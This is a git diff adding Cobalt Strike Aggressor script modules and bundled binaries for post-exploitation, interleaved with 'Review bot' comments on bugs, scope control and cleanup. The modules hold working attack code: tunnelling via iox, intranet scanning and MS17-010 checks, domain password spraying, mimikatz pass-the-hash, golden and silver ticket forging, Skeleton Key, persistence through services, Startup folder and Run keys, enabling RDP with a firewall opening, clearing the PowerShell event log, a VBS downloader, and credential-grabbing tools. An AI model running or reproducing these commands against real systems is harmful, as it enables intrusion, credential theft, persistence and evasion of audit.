Project address: https://github.com/EddieIvan01/iox"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub iox { +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Intranet agent/iox.exe")); +} +item "Run iox(fwd)"{ +$bid = $1['@']; +$Dialog = dialog("Run iox",%(lhost => "192.168.0.100:3389", rhost => "*x.x.x.x:3389", hex => "656565",bid => $bid),&iox_fwdrun); +dialog_description($Dialog, "vps run: ./iox fwd -l *3389 -l 33890 -k 656565"); +drow_text($Dialog, "lhost", "local IP:Port"); +drow_text($Dialog, "rhost", "public IP:Port"); +drow_text($Dialog, "hex", "traffic encryption key: "); +dbutton_action($Dialog, "Run"); +dialog_show($Dialog); +} + sub iox_fwdrun{ +local('$lhost $rhost $hex'); +$lhost = $3['lhost']; +$rhost = replace($3['rhost'], "\"", ""); +$hex = $3['hex']; +bshell($bid, "iox.exe fwd -r $+ $lhost -r $+ $rhost -k $+ $hex"); +} + +item "Run iox(proxy)"{ +$bid = $1['@']; +$Dialog = dialog("Run iox",%(rhost => "*x.x.x.x:9999", hex => "000102",bid => $bid),&iox_proxyrun); +dialog_description($Dialog, "vps first establishes a service: ./iox proxy -l *9999 -l 1080 -k 000102"); +drow_text($Dialog, "rhost", "Public IP:Port"); +drow_text($Dialog, "hex", "Traffic encryption key: "); +dbutton_action($Dialog, "Run"); +dialog_show($Dialog); +} +sub iox_proxyrun{ +local('$rhost $hex'); +$rhost = $3['rhost']; +$hex = replace($3['hex'], "\"", ""); +bshell($bid, "iox.exe proxy -r $+ $rhost -k $+ $hex"); +} + +item "Stop iox"{ +local('$bid'); +foreach $bid ($1){ +bshell($1, "taskkill -f /im iox.exe"); +} +} +item "Delete iox"{ +local('$bid'); +foreach $bid ($1){ bshell($1, "taskkill -f /im iox.exe & del /f /s /q iox.exe"); } } + } + +} diff --git a/English/modules/Intranet scanning.cna b/English/modules/Intranet scanning.cna new file mode 100644 index 0000000..383d92c --- /dev/null +++ b/English/modules/Intranet scanning.cna 
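Review bot: Only one field per callback is filtered before the command line is built: `frpc_run` strips `"` from `port` but not from `ip`, `npc_run` from `vkey` but not `server`, `nb_run` and `iox_fwdrun` from `rhost` only, and `iox_proxyrun` from `hex` only. Nothing removes `&`, `|` or `>`, which `cmd.exe` treats as operators, so a typo or a pasted value in any field becomes extra shell syntax executed on the assessed host. Each field should be checked against its expected shape before `bshell` is called, for example refusing to run unless `$3['port'] ismatch '\d{1,5}'`, and reporting the rejection with `berror` instead of tasking the session.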
@@ -0,0 +1,110 @@ +menu "Intranet Scan" { +menu "fscan" { +item "Upload fscan" { +$bid = $1; +$dialog = dialog("Upload fscan", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &fscan); +dialog_description($dialog, "Supports host survival detection, port scanning, common service blasting, ms17010, redis batch writing private keys, scheduled task rebound shell, read win network card information, etc. Project address: https://github.com/shadow1ng/fscan"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub fscan { +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Intranet scanning/fscan.exe")); +} +item "Run fscan"{ +$bid = $1['@']; +$dialog = dialog("Run fscan",%(exec => "fscan.exe -h 192.168.1.1/24 -o ok.txt", bid => $bid),&fscan_run); +dialog_description($dialog, "Pay attention to the instructions for use of the console output, and enter the execution command directly below:"); +drow_text($dialog, "exec", "Exec: "); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub fscan_run{ +$exec = $3['exec']; +bshell($bid, "$exec"); +} +item "Delete fscan"{ +$bid = $1['@']; +bshell($bid, "taskkill -f /im fscan.exe & del /f /s /q fscan.exe"); +} +} + item "SharpWebScan (detect web service)" { +$bid = $1['@']; +$dialog = dialog("SharpWebScan", %(iptype => "-IP",ip => beacon_info($bid,"internal"),port => "80,443,7001,8000,8001,8080,8888",bid => $bid), &SharpWebScan); +dialog_description($dialog, "Scan IP or C segment web service, get Title, customizable multi-port scanning, return web address and title. 
Project address: https://github.com/RcoIl/CSharp-Tools/tree/master/SharpWebScan"); +drow_text($dialog, "ip", "ip: "); +drow_text($dialog, "port", "ports: "); +drow_combobox($dialog, "iptype", "-ip/-cip", @("-IP", "-CIP")); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub SharpWebScan { +$arg = join(' ', @($3['iptype'],$3['ip'],$3['port'])); +bexecute_assembly($bid, script_resource("/scripts/Intranet scanning/SharpWebScan.exe"), $arg); +} + +menu "TailorScan (Seamless Intranet Scanner)" { +item "Upload TailorScan" { +$bid = $1; +$dialog = dialog("Upload TailorScan", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &TailorScan); +dialog_description($dialog, "Support port scanning, identify services, get title, scan multiple network cards, ms17010 scan, icmp survival detection. Project address: https://github.com/uknowsec/TailorScan"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub TailorScan { +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Intranet scanning/TailorScan.exe")); +} +item "Run TailorScan"{ +$bid = $1['@']; +btask($bid, " ", ""); +btask($bid, "TailorScan.exe", ""); +btask($bid, " ", ""); +btask($bid, "Scan IP format support:", ""); +btask($bid, " 192.168.1.1", ""); +btask($bid, " 192.168.1.1-10", ""); +btask($bid, " 192.168.1.*", ""); +btask($bid, " 192.168.1.0/24", ""); +btask($bid, " ", ""); +btask($bid, "Port supports custom list, separated by ',', such as:", ""); +btask($bid, " 21,22,80-99,8000-8080", ""); +btask($bid, " ", ""); +btask($bid, "Port scan, supports tcp, icmp:", ""); +btask($bid, " TailorScan.exe portscan 192.168.0.1/24 80,8080 tcp", ""); +btask($bid, " TailorScan.exe portscan 192.168.0.1/24 tcp", ""); btask($bid, " ", ""); btask($bid, "Eternal Blue Detection:", ""); btask($bid, " TailorScan.exe ms17010 -i 192.168.0.1", ""); btask($bid, " TailorScan.exe ms17010 -n 192.168.0.1/24", ""); btask($bid, " ", ""); btask($bid, "OXID 
Find:", ""); btask($bid, " TailorScan.exe oxidfind -i 192.168.0.1", ""); btask($bid, " TailorScan.exe oxidfind -n 192.168.0.1/24", ""); +btask($bid, " ", ""); +btask($bid, "ICMP check:", ""); +btask($bid, " TailorScan.exe icmpcheck 192.168.0.1/24", ""); +btask($bid, " ", ""); +$dialog = dialog("Run TailorScan",%(exec => "TailorScan.exe ms17010 -n 192.168.0.1/24", bid => $bid),&TailorScan_run); +dialog_description($dialog, "Pay attention to the instructions for use of the console output, and enter the execution command directly below:"); +drow_text($dialog, "exec", "Exec: "); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub TailorScan_run{ +$exec = $3['exec']; +bshell($bid, "$exec"); +} +item "Delete TailorScan"{ +$bid = $1['@']; +bshell($bid, "taskkill -f /im TailorScan.exe & del /f /s /q TailorScan.exe"); +} +} + +item "SharpSpray (Domain Password Explosion)" { +$bid = $1['@']; +$dialog = dialog("SharpSpray", %(passwd => "123,888",Delay => "1000",Sleep => "1",bid => $bid), &SharpSpray); +dialog_description($dialog, "Use LDAP to perform password spray attack on all users in the domain. seeds: specify several password generation dictionaries, separated by commas. passwords: specify password blasting, multiple passwords can be separated by commas. delay: password spray delay, in milliseconds. sleep: The number of minutes between password guesses. 
Project address: https://github.com/jnqpblc/SharpSpray"); +drow_combobox($dialog, "type", "type:", @("--Seeds","--Passwords")); +drow_text($dialog, "passwd", "passwd: "); +drow_text($dialog, "Delay", "Delay: "); +drow_text($dialog, "Sleep", "Sleep: "); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub SharpSpray { +$arg = join(' ', @($3['type'],$3['passwd'],"--Sleep",$3['Sleep'],"--Delay",$3['Delay'])); +bexecute_assembly($bid, script_resource("/scripts/Intranet scanning/SharpSpray.exe"), $arg); } item "Mimikatz-pth"{ local('$bid'); foreach $bid ($1){ mimikatz_passthehash($bid); } } sub mimikatz_passthehash{ $bid = $1; $dialog = dialog("Pass-The-Hash" , %(beacon => $1 , domain => "xxx.com" , user => "administrator" , hash => "hash") , lambda({ bpassthehash($3["beacon"] , $3["domain"] , $3["user"] , $3["hash"]); })); dialog_description($dialog, "mimikatz pass-the-hash attack."); drow_text($dialog, "beacon", "Beacon:"); drow_text($dialog, "domain", "Domain:"); drow_text($dialog, "user", "User:"); drow_text($dialog, "hash", "Hash:"); dbutton_action($dialog, "Launch"); dialog_show($dialog); } } \ No newline at end of file diff --git a/English/modules/Locate AD.cna b/English/modules/Locate AD.cna new file mode 100644 index 0000000..3b58589 --- /dev/null +++ b/English/modules/Locate AD.cna 
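Review bot: The dialog callbacks in this file (`fscan_run`, `TailorScan_run`, `SharpWebScan`, `SharpSpray` and the upload subs) act on the script-global `$bid` rather than on the `bid` value each dialog already carries in its defaults. A callback therefore runs against whichever session last assigned `$bid`, so with two dialogs open a command can land on a host the operator did not select, which is a scope-control problem in an authorised test. Assuming the dialog hands its defaults back in `$3`, read the id from there, e.g. `bshell($3['bid'], $3['exec']);`, and declare the temporaries with `local('$exec $arg')`. The same pattern appears in the Locate AD, Permission retention and RDP hunks further down.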
@@ -0,0 +1,33 @@ +menu "Locate Domain Admin" { +menu "PsLoggedon" { +item "Upload PsLoggedon" { +$bid = $1; +$dialog = dialog("Upload PsLoggedon", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &PsLoggedon); +dialog_description($dialog, "Microsoft official tool, some functions of this tool require administrator privileges. Project address: https://docs.microsoft.com/zh-cn/sysinternals/downloads/psloggedon"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub PsLoggedon{ +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Locate AD/PsLoggedon.exe")); +} +item "Run PsLoggedon"{ bshell($bid, "PsLoggedon64.exe"); } item "DeletePsLoggedon"{ local('$bid'); foreach $bid ($1){ bshell($1, "del /f /s /q PsLoggedon.exe"); } } } item "PVEFindADUser" { bexecute_assembly($1, script_resource("/scripts/Locate AD/PVEFindADUser.exe"),"-current"); bshell($1, "del /f /s /q report.csv"); } menu "netview" { item "upload netview" { $bid = $1; $dialog = dialog("Upload netview", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &netview); dialog_description($dialog, "Most functions do not require administrator privileges. Project address: https://github.com/mubix/netview"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub netview { +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Locate AD/netview.exe")); +} +item "Run netview"{ +$bid = $1['@']; +$Dialog = dialog("Run netview",%(domain => "xxx.com",bid => $bid),&netview_run); +drow_text($Dialog, "domain", "domain: "); +dbutton_action($Dialog, "Run"); +dialog_show($Dialog); +} +sub netview_run{ +local('$Name'); +$Name = $3['domain']; bshell($bid, "netview.exe $+ $Name"); } item "delete netview"{ local('$bid'); foreach $bid ($1){ bshell($1, "del /f /s /q netview.exe"); } } } } \ No newline at end of file 
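Review bot: The three PsLoggedon items disagree on the file name: the upload sub pushes `PsLoggedon.exe`, "Run PsLoggedon" executes `PsLoggedon64.exe`, and "DeletePsLoggedon" removes `PsLoggedon.exe`. The run item therefore depends on a binary this script never delivers, and a binary of that name is not covered by the delete item, so it stays on the tested host. Use one name in all three places, e.g. `bshell($bid, "PsLoggedon.exe");`. "Run PsLoggedon" also never assigns `$bid`, and both delete loops pass `$1` to `bshell` instead of the loop variable `$bid`.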
diff --git a/English/modules/Permission retention.cna b/English/modules/Permission retention.cna new file mode 100644 index 0000000..d2b51b4 --- /dev/null +++ b/English/modules/Permission retention.cna 
@@ -0,0 +1,135 @@ +menu "Permission maintenance" { +item "Skeleton Key"{ +$bid = $1['@']; +bmimikatz($bid , "misc::skeleton"); +} + +item "Silver Ticket" { +$bid = $1['@']; +$dialog = dialog("Silver Ticket", %(user => "administrator", domain => "xxxx.com", sid => "sid", target => "dc.xxxx.com", rc4 => "NTLM", service => "cifs", bid => $bid), &SilverTicket); +dialog_description($dialog, "To generate a silver ticket, the attacker must obtain the target service account's password ntml-hash value."); +drow_text($dialog, "domain", "Domain name: "); +drow_text($dialog, "sid", "sid: "); +drow_text($dialog, "target", "Target host name: "); +drow_text($dialog, "rc4", "NTLM-hash: "); +drow_text($dialog, "service", "Fake service: "); +drow_text($dialog, "user", "Fake user name: "); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} + sub SilverTicket { $user = $3['user']; $domain = $3['domain']; $sid = $3['sid']; $target = $3['target']; $rc4 = $3['rc4']; $service = $3['service']; bmimikatz($bid, "kerberos::golden /domain:$domain /sid:$sid /target:$target /rc4:$rc4 /service:$service /user:$user /ptt exit"); } item "gold note" { $bid = $1['@']; $dialog = dialog("Golden Ticket", %(admin => "administrator", domain => "xxxx.com", sid => "sid", krbtgt => "NTLM", bid => $bid), &GoldenTicket ); dialog_description($dialog, "To generate a golden ticket, the attacker must obtain the ntml-hash value of the krbtgt account."); +drow_text($dialog, "admin", "Fake username: "); +drow_text($dialog, "domain", "Domain name: " ); +drow_text($dialog, "sid", "sid: "); +drow_text($dialog, "krbtgt", "krbtgt NTLM-hash: "); +dbutton_action($dialog, "Run"); +dialog_show($dialog) ; +} +sub GoldenTicket { +$admin = $3['admin']; +$domain = $3['domain']; +$sid = $3['sid']; +$krbtgt = $3['krbtgt']; +bmimikatz($bid, "kerberos::golden /admin:$admin /domain:$domain /sid:$sid /krbtgt:$krbtgt /ptt exit"); +} + + menu "Self-start" { +item "Transfer horse" { +$bid = $1; +$dialog = dialog("Upload your 
horse", %(FileName => "/Users/zjun/Downloads/ma.exe", UploadPath => "C:\\Users\\Public\\", bid => $bid), &upload); +dialog_description($dialog, "Upload your horse"); +drow_text($dialog, "FileName", "Local path: "); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub upload { +bcd($bid, $3['UploadPath']); +bupload($bid, $3['FileName']); +} +menu "Self-start service" { +item "Create self-start service" { +$bid = $1['@']; +$dialog = dialog("Create a self-starting service", %(service => "dwm", program => "C:\\Users\\Public\\ma.exe", bid => $bid), &auto); +drow_text($dialog, "service", "Create service name: "); +drow_text($dialog, "program", "Program path: "); +dialog_description($dialog, "Add service to run automatically."); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub auto { +$service = $3['service']; +$program = $3['program']; +bshell($bid, "sc create $service binPath= $program start= auto"); +} +item "Delete self-starting service" { +$bid = $1['@']; +$dialog = dialog("Delete self-starting service", %(service => "dwm", bid => $bid), &del); +drow_text($dialog, "service", "Service name: "); +dialog_description($dialog, "Delete the auto-start service. 
"); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub del{ +$service = $3['service']; +bshell($bid, "sc delete $service"); +} +} +menu "Startup folder" { +item "Copy to startup folder" { +$bid = $1['@']; +$dialog = dialog("Copy to startup folder", %(program => "C:\\Users\\Public\\ma.exe", user => "administrator", bid => $bid), &auto); +drow_text($dialog, "program", "Program path: "); +drow_text($dialog, "user", "User name: "); +dialog_description($dialog, "Copy to startup folder."); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} + sub auto { +$program = $3['program']; +$user = $3['user']; +bshell($bid, "copy \"$program\" \"C:\\Users\\$user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\""); +} +item "Delete the auto-start folder program" { +$bid = $1['@']; +$dialog = dialog("Delete the auto-start service", %(program => "dwm", bid => $bid), &del); +drow_text($dialog, "service", "Service name: "); +dialog_description($dialog, "Delete the auto-start service."); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub del{ +$service = $3['service']; +bshell($bid, "sc delete $service"); +} +} +menu "Add registry to achieve auto-start" { +item "Add registry to achieve self-start" { +$bid = $1['@']; +$dialog = dialog("Add registry to achieve self-start", %(program => "C:\\Users\\Public\\ma.exe", name =>"start", bid => $bid), &auto); +drow_text($dialog, "program", "Program path: "); +drow_text($dialog, "name", "Name: "); +dialog_description($dialog, "Add registry to achieve self-start."); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub auto { +$program = $3['program']; +$name = $3['name']; +bshell($bid, "reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"$name\" /d \"$program\" /f"); +} +item "Delete registry auto-start" { +$bid = $1['@']; +$dialog = dialog("Delete registry auto-start", %(name => "start", bid => $bid), &del); +drow_text($dialog, "name", "Name: "); 
+dialog_description($dialog, "Delete registry auto-start."); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub del{ +$name = $3['name']; +bshell($bid, "reg delete \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"$name\" /f"); +} +} +} +} \ No newline at end of file diff --git a/English/modules/RDP.cna b/English/modules/RDP.cna new file mode 100644 index 0000000..48c773f --- /dev/null +++ b/English/modules/RDP.cna 
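Review bot: `sub auto` and `sub del` are each defined three times in this file (service, startup folder, Run key); Sleep subroutines presumably share one namespace, so the last definitions would win and every "Create"/"Delete" dialog would end up in the Run-key handlers. Even read on its own, the "Delete the auto-start folder program" item calls `sc delete $service` and reads a `service` row that its defaults do not define (`program => "dwm"`), so it can remove an unrelated Windows service while the file copied to the Startup folder stays in place. Give each mechanism its own pair, e.g. `&svc_add`/`&svc_del`, `&startup_add`/`&startup_del`, `&runkey_add`/`&runkey_del`, and have the startup delete remove the copied file from the same Startup path the copy wrote to. As written, auto-start entries created during a test cannot be rolled back reliably and remain on the host.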
@@ -0,0 +1,47 @@
+menu "RDP related" {
+item "Get RDP port" {
+local('$bid');
+foreach $bid ($1){
+blog($1, "Check Rdp Open Port");
+bpowershell_import($bid, script_resource("/scripts/RDP/RegRdpPort.ps1"));
+bpowerpick($bid,"RegRdpPort");
+bshell($bid,"wevtutil cl \"Windows PowerShell\"");
+}
+}
+item "Check whether RDP is enabled" {
+blog($1, "Please execute manually: shell netstat -ano | findstr \$RDP port")
+}
+
+item "Enable RDP service" {
+$bid = $1['@'];
+bshell($bid, "REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 0 /f");
+bshell($bid, "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1");
+}
+
+item "Close RDP service" {
+$bid = $1['@'];
+bshell($bid, "REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 1 /f");
+bshell($bid, "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0");
+}
+
+item "Force online users to log off" {
+$bid = $1['@'];
+bshell($bid,"query user");
+$Dialog = dialog("Force online users to log off",%(ID => "",bid => $bid),&logoff);
+dialog_description($Dialog, "Pay attention to the console output and fill in the ID number.");
+drow_text($Dialog, "ID", "id: ");
+dbutton_action($Dialog, "Run");
+dialog_show($Dialog);
+}
+sub logoff{
+local('$ID');
+$ID = $3['id'];
+bshell($bid, "logoff $ID");
+}
+
+item "Firewall RDP Release Rule" {
+$bid = $1['@'];
+bshell($bid, "netsh advfirewall firewall add rule name=\"Remote Desktop\" protocol=TCP dir=in localport=3389 action=allow");
+}
+
+}
\ No newline at end of file
diff --git a/English/scripts/Add user/NetUser.exe b/English/scripts/Add user/NetUser.exe
new file mode 100644
index 0000000..b0a9317
Binary files /dev/null and b/English/scripts/Add user/NetUser.exe differ
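Review bot: "Get RDP port" ends with `bshell($bid,"wevtutil cl \"Windows PowerShell\"");`, which clears the host's entire Windows PowerShell event log as an unannounced side effect of a read-only lookup and takes the system owner's audit history with it. Drop that line; if the rules of engagement really call for it, it belongs in its own clearly labelled item, and defenders can in any case see the clear as System event 104. "Firewall RDP Release Rule" has no counterpart that removes the rule, so "Close RDP service" leaves TCP 3389 allowed inbound; a matching item would run `netsh advfirewall firewall delete rule name="Remote Desktop"`. In `logoff`, `$3['id']` appears not to match the `ID` key the dialog defines.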
diff --git a/English/scripts/Add user/bof_net_user.o b/English/scripts/Add user/bof_net_user.o
new file mode 100644
index 0000000..0360b59
Binary files /dev/null and b/English/scripts/Add user/bof_net_user.o differ
diff --git a/English/scripts/Auxiliary/SharpOSS.exe b/English/scripts/Auxiliary/SharpOSS.exe
new file mode 100644
index 0000000..fffceb3
Binary files /dev/null and b/English/scripts/Auxiliary/SharpOSS.exe differ
diff --git a/English/scripts/Auxiliary/SharpZip.exe b/English/scripts/Auxiliary/SharpZip.exe
new file mode 100644
index 0000000..1b39436
Binary files /dev/null and b/English/scripts/Auxiliary/SharpZip.exe differ
diff --git a/English/scripts/Auxiliary/download.vbs b/English/scripts/Auxiliary/download.vbs
new file mode 100644
index 0000000..85a7e44
--- /dev/null
+++ b/English/scripts/Auxiliary/download.vbs
@@ -0,0 +1,67 @@
+dim url
+dim file
+Set objArgs = WScript.Arguments
+if objArgs.Count < 2 then
+ msgbox("Invalid param count! should be: url pathfilename")
+Else
+ url = objArgs(0)
+ file = objArgs(1)
+ GetHttpResult url, "UTF-8", file
+end if
+
+
+function GetHttpResult(url, charset, file)
+ dim http
+ set http = Createobject("Msxml2.ServerXMLHTTP")
+ Http.setTimeouts 10000, 10000, 10000, 10000 'ÉèÖó¬Ê±Ê±¼ä
+ 'Sub setTimeouts(ByVal resolveTimeout As Long, ByVal connectTimeout As Long, ByVal sendTimeout As Long, ByVal receiveTimeout As Long)
+
+ http.Open "GET", url, False
+ 'Sub open(ByVal bstrMethod As String, ByVal bstrUrl As String, [ByVal varAsync], [ByVal bstrUser], [ByVal bstrPassword])
+
+ http.Send()
+
+ If http.readystate = 4 Then
+ GetHttpResult = SaveToFile(http.ResponseBody, charset, file)
+ End If
+
+end function
+
+Function SaveToFile(str, charset, file)
+ Dim objStream
+ Set objStream = CreateObject("Adodb.Stream")
+
+ objStream.Type = 1
+ 'Const adTypeBinary = 1
+ 'Const adTypeText = 2
+
+ objStream.Mode = 3
+ 'Const adModeRead = 1
+ 'Const adModeReadWrite = 3
+ 'Const adModeRecursive = 4194304
+ 'Const adModeShareDenyNone = 16
+ 'Const adModeShareDenyRead = 4
+ 'Const adModeShareDenyWrite = 8
+ 'Const adModeShareExclusive = 12
+ 'Const adModeUnknown = 0
+ 'Const adModeWrite = 2
+
+
+ objStream.Open
+ objStream.Write str
+ objStream.Position = 0
+
+ objStream.Type = 2
+ 'adTypeBinary = 1
+ 'adTypeText = 2
+
+ objStream.Charset = charset
+' BytesToStr = objStream.ReadText
+
+ objStream.SaveToFile file, 2
+ 'adSaveCreateNotExist = 1
+ 'adSaveCreateOverWrite = 2
+
+ objStream.Close
+ Set objStream = Nothing
+End Function
\ No newline at end of file
diff --git a/English/scripts/Grab password/BrowserGhost.exe b/English/scripts/Grab password/BrowserGhost.exe
new file mode 100644
index 0000000..9153205
Binary files /dev/null and b/English/scripts/Grab password/BrowserGhost.exe differ
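Review bot: `GetHttpResult` writes the response body to disk as soon as `http.readystate = 4`, without looking at the HTTP status, so a 404 or a proxy error page is saved under the requested file name and the caller gets no failure signal. Guard the save with `If http.readystate = 4 And http.Status = 200 Then` and report the status otherwise. The trailing comment on the `setTimeouts` line is mis-encoded; something like `'Timeouts in ms: resolve, connect, send, receive` would say what the next comment line already documents.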
diff --git a/English/scripts/Grab password/CredPhisher.exe b/English/scripts/Grab password/CredPhisher.exe
new file mode 100644
index 0000000..0d2202b
Binary files /dev/null and b/English/scripts/Grab password/CredPhisher.exe differ
diff --git a/English/scripts/Grab password/FakeLogonScreenToFile.exe b/English/scripts/Grab password/FakeLogonScreenToFile.exe
new file mode 100644
index 0000000..7d75559
Binary files /dev/null and b/English/scripts/Grab password/FakeLogonScreenToFile.exe differ
diff --git a/English/scripts/Grab password/Net-GPPPassword_dotNET_v2.exe b/English/scripts/Grab password/Net-GPPPassword_dotNET_v2.exe
new file mode 100644
index 0000000..8cc2c3a
Binary files /dev/null and b/English/scripts/Grab password/Net-GPPPassword_dotNET_v2.exe differ
diff --git a/English/scripts/Grab password/SharpChromium.exe b/English/scripts/Grab password/SharpChromium.exe
new file mode 100644
index 0000000..c5abca2
Binary files /dev/null and b/English/scripts/Grab password/SharpChromium.exe differ
diff --git a/English/scripts/Grab password/SharpCloud.exe b/English/scripts/Grab password/SharpCloud.exe
new file mode 100644
index 0000000..2e430a1
Binary files /dev/null and b/English/scripts/Grab password/SharpCloud.exe differ
diff --git a/English/scripts/Grab password/SharpDecryptPwd.exe b/English/scripts/Grab password/SharpDecryptPwd.exe
new file mode 100644
index 0000000..de4722d
Binary files /dev/null and b/English/scripts/Grab password/SharpDecryptPwd.exe differ
diff --git a/English/scripts/Grab password/SharpDecryptPwd40.exe b/English/scripts/Grab password/SharpDecryptPwd40.exe
new file mode 100644
index 0000000..7664850
Binary files /dev/null and b/English/scripts/Grab password/SharpDecryptPwd40.exe differ
diff --git a/English/scripts/Grab password/SharpWifiGrabber.exe b/English/scripts/Grab password/SharpWifiGrabber.exe
new file mode 100644
index 0000000..f1afbad
Binary files /dev/null and b/English/scripts/Grab password/SharpWifiGrabber.exe differ
diff --git a/English/scripts/Grab password/hack-browser-data.exe b/English/scripts/Grab password/hack-browser-data.exe
new file mode 100644
index 0000000..a58b8fd
Binary files /dev/null and b/English/scripts/Grab password/hack-browser-data.exe differ
diff --git a/English/scripts/Grab password/lock-screen.ps1 b/English/scripts/Grab password/lock-screen.ps1
new file mode 100644
index 0000000..acf90db
--- /dev/null
+++ b/English/scripts/Grab password/lock-screen.ps1
@@ -0,0 +1,14 @@
+Function Lock-WorkStation {
+
+$signature = @"
+[DllImport("user32.dll", SetLastError = true)]
+public static extern bool LockWorkStation();
+"@
+
+$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
+
+$LockWorkStation::LockWorkStation() | Out-Null
+
+}
+
+Lock-WorkStation
\ No newline at end of file
diff --git a/English/scripts/Information collection/AdFind.exe b/English/scripts/Information collection/AdFind.exe
new file mode 100644
index 0000000..1cfe1c9
Binary files /dev/null and b/English/scripts/Information collection/AdFind.exe differ
diff --git a/English/scripts/Information collection/SharpAVKB.exe b/English/scripts/Information collection/SharpAVKB.exe
new file mode 100644
index 0000000..d436493
Binary files /dev/null and b/English/scripts/Information collection/SharpAVKB.exe differ
diff --git a/English/scripts/Information collection/SharpChassisType.exe b/English/scripts/Information collection/SharpChassisType.exe
new file mode 100644
index 0000000..e9da22c
Binary files /dev/null and b/English/scripts/Information collection/SharpChassisType.exe differ
diff --git a/English/scripts/Information collection/SharpCheckInfo.exe b/English/scripts/Information collection/SharpCheckInfo.exe
new file mode 100644
index 0000000..28069aa
Binary files /dev/null and b/English/scripts/Information collection/SharpCheckInfo.exe differ
diff --git a/English/scripts/Information collection/SharpClipHistory.exe b/English/scripts/Information collection/SharpClipHistory.exe
new file mode 100644
index 0000000..c85fc0e
Binary files /dev/null and b/English/scripts/Information collection/SharpClipHistory.exe differ
diff --git a/English/scripts/Information collection/SharpDir.exe b/English/scripts/Information collection/SharpDir.exe
new file mode 100644
index 0000000..2764b7c
Binary files /dev/null and b/English/scripts/Information collection/SharpDir.exe differ
diff --git a/English/scripts/Information collection/SharpEDRChecker.exe b/English/scripts/Information collection/SharpEDRChecker.exe
new file mode 100644
index 0000000..db80a9c
Binary files /dev/null and b/English/scripts/Information collection/SharpEDRChecker.exe differ
diff --git a/English/scripts/Information collection/SharpEventLog.exe b/English/scripts/Information collection/SharpEventLog.exe
new file mode 100644
index 0000000..4ba6dea
Binary files /dev/null and b/English/scripts/Information collection/SharpEventLog.exe differ
diff --git a/English/scripts/Information collection/SharpSQLDump.exe b/English/scripts/Information collection/SharpSQLDump.exe
new file mode 100644
index 0000000..1b97b4c
Binary files /dev/null and b/English/scripts/Information collection/SharpSQLDump.exe differ
diff --git a/English/scripts/Information collection/SharpWebScan.exe b/English/scripts/Information collection/SharpWebScan.exe
new file mode 100644
index 0000000..17f2977
Binary files /dev/null and b/English/scripts/Information collection/SharpWebScan.exe differ
diff --git a/English/scripts/Information collection/everything/Everything.exe b/English/scripts/Information collection/everything/Everything.exe
new file mode 100644
index 0000000..5bbff59
Binary files /dev/null and b/English/scripts/Information collection/everything/Everything.exe differ
diff --git a/English/scripts/Information collection/everything/Everything.ini b/English/scripts/Information collection/everything/Everything.ini
new file mode 100644
index 0000000..883e519
--- /dev/null
+++ b/English/scripts/Information collection/everything/Everything.ini
@@ -0,0 +1,737 @@ +; Please make sure Everything is not running before modifying this file. +[Everything] +run_as_admin=1 +allow_http_server=1 +allow_etp_server=1 +window_x=198 +window_y=89 +window_wide=785 +window_high=650 +maximized=0 +minimized=0 +fullscreen=0 +ontop=0 +bring_into_view=1 +alpha=255 +match_whole_word=0 +match_path=0 +match_case=0 +match_diacritics=0 +match_regex=0 +view=0 +thumbnail_size=64 +thumbnail_fill=0 +min_thumbnail_size=32 +max_thumbnail_size=256 +medium_thumbnail_size=64 +large_thumbnail_size=128 +extra_large_thumbnail_size=256 +thumbnail_load_size=0 +thumbnail_overlay_icon=1 +shell_max_path=0 +allow_multiple_windows=0 +allow_multiple_instances=0 +run_in_background=1 +show_in_taskbar=1 +show_tray_icon=1 +minimize_to_tray=0 +toggle_window_from_tray_icon=0 +alternate_row_color=0 +show_mouseover=0 +check_for_updates_on_startup=0 +beta_updates=0 +show_highlighted_search_terms=1 +text_size=0 +hide_empty_search_results=0 +clear_selection_on_search=1 +show_focus_on_search=0 +new_window_key=0 +show_window_key=0 +toggle_window_key=0 +language=0 +show_selected_item_in_statusbar=1 +statusbar_selected_item_format= 